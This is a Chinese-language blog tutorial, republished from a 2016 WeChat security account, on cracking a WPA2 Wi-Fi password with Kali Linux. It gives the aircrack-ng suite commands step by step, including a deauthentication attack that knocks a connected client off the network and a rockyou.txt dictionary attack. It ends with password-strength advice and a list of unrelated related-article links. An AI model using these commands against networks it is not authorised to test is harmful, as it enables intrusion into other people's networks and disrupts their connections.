无线安全专题01--kali破解WPA

前言

最近一直用flask写自己的博客框架,等过段时间才能将其分享出来,所以在此期间决定开个无线安全的专题,分享一些无线安全方面的知识。

  好了,废话不多说,咱们进入今天的主题,使用kali linux上的无线安全工具对wpa加密的wifi进行密码破解。由于现在wep加密太少了,所以直接略过,选择破解wpa。WPA破解是通过截获客户端和路由器之间的握手包,根据字典的大小进行暴力破解,也就是说字典的大小直接决定了破解的成功与否。

破解条件

操作系统:kali linux

硬件:无线网卡 WN722N

破解步骤

(1)打开终端:1.输入ifconfig,查看无线网卡是否加载了

2.输入:airmon-ng start wlan3,将网络启动为监听模式

3.输入:airodump-ng wlan3mon 监听网络数据包 ,如果出现以下错误,继续执行图中代码。

继续输入:airodump-ng wlan3mon,会出现监听界面。

从监听界面中我们可以看到这个wifi的mac地址8C:AB:8E:A9:CB:60,加密方式:WPA2,所在的信道1.

这个wifi现在有一个客户端正在进行连接。接下来开始抓包,抓取握手包。

4.输入 airodump-ng -c 1 --bssid 8C:AB:8E:A9:CB:60 -w phi wlan3mon

-c:指定信道

--bssid:指定wifi mac

-w:指定抓取的数据包存储的文件

5:这时候我们需要再开启一个终端进行取消验证攻击,迫使这个已经连上的客户端断开。

这样当客户端自动连接的时候,就可以抓取这个握手包了。

在新的终端中执行:

aireplay-ng -0 3 -a 8C:AB:8E:A9:CB:60 -c 70:1A:04:B7:1A:90 wlan3mon

-0:指定为取消验证攻击

3:攻击次数

-a:指定ap的mac

-c:指定客户端的mac

6:执行完之后,过一会就会看到监听到了握手包。

7:既然抓到了握手包,Ctrl+C停止抓包。

使用aircrack-ng进行暴力破解。

在终端中输入:

aircrack-ng -w /usr/share/wordlists/rockyou.txt phi-01.cap

-w:指定破解用的密码字典

phi-01.cap:抓取握手包的数据包

大约过了5分钟,爆破成功.出现了KEY FOUND后面的中括号中就是密码。

总结

1.由于WPA破解是采用暴力破解的方式(路由器没有开启wps),字典越大,破解的可能性越大。所以大家尽量设置复杂的密码,多位数+字母。

2.很多人采取隐藏SSID,不暴露wifi名称的方式来防止被破解,事实并没有什么用,依然能捕获到你的mac,整个破解过程中并不需要知道你的wifi名称。

今天的分享就到这里,下一篇继续分析。如果大家觉得还可以呀,记得分享呦。

原文发布于微信公众号 - 七夜安全博客(qiye_safe)

原文发表时间:2016-08-21

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏史上最简单的Spring Cloud教程

JSON Web Tokens介绍

什么是JWT 这篇文章选择性翻译于https://jwt.io/introduction/ JWT简介 JSON Web Token(JWT)是一种开放标准(...

23880
来自专栏Python爬虫与数据挖掘

在Windows上如何安装和彻底卸载Adobe Flash Player教程

很多小伙伴在安装水晶易表的时候,经常会遇到“Xcelsius2008需要使用Adobe Flash Player(9.151或者更高版本)”报错问题,如下图所示...

22020
来自专栏james大数据架构

Android 程序打包及签名

为什么要签名???     开发Android的人这么多,完全有可能大家都把类名,包名起成了一个同样的名字,这时候如何区分?签名这时候就是起区分作用的。    ...

23760
来自专栏菩提树下的杨过

[原创图解]Win2003证书服务配置/客户端(服务端)证书申请/IIS站点SSL设置

[原创图解]Win2003证书服务配置/客户端(服务端)证书申请/IIS站点SSL设置 --欢迎转载,但转载请注明来自“菩提树下的杨过” 一.CA证书服务...

35250

在 CentOS 7 上使用 Apache 的 SSL 证书

本指南将向你演示如何启用 SSL 来保护由 CentOS 或者 Fedora 上的 Apache 提供服务的网站。

24420
来自专栏刘望舒

Android响应式编程(一)RxJava前篇[入门基础]

1.RxJava概述 ReactiveX与RxJava 在讲到RxJava之前我们首先要了解什么是ReactiveX,因为RxJava是ReactiveX的一种...

24150
来自专栏流媒体

Https详解+wireshark抓包演示

在说HTTPS之前先说说什么是HTTP,HTTP就是我们平时浏览网页时候使用的一种协议。HTTP协议传输的数据都是未加密的,也就是明文的,因此使用HTTP协议传...

66550
来自专栏Angular&服务

Nginx配置https协议

使用 https 协议访问你的域名, 如 https://www.yourdomain.com/hello.html 检查是否成功,如果地址栏出现绿色带安全字样...

24510
来自专栏晓晨的专栏

ASP.NET Core 使用 Alipay.AopSdk.Core 常见问题解答

25210
来自专栏Java后端技术栈

前后端分离后API交互如何保证数据安全性?

前后端分离的开发方式,我们以接口为标准来进行推动,定义好接口,各自开发自己的功能,最后进行联调整合。无论是开发原生的APP还是webapp还是PC端的软件,只要...

44310

扫码关注云+社区

领取腾讯云代金券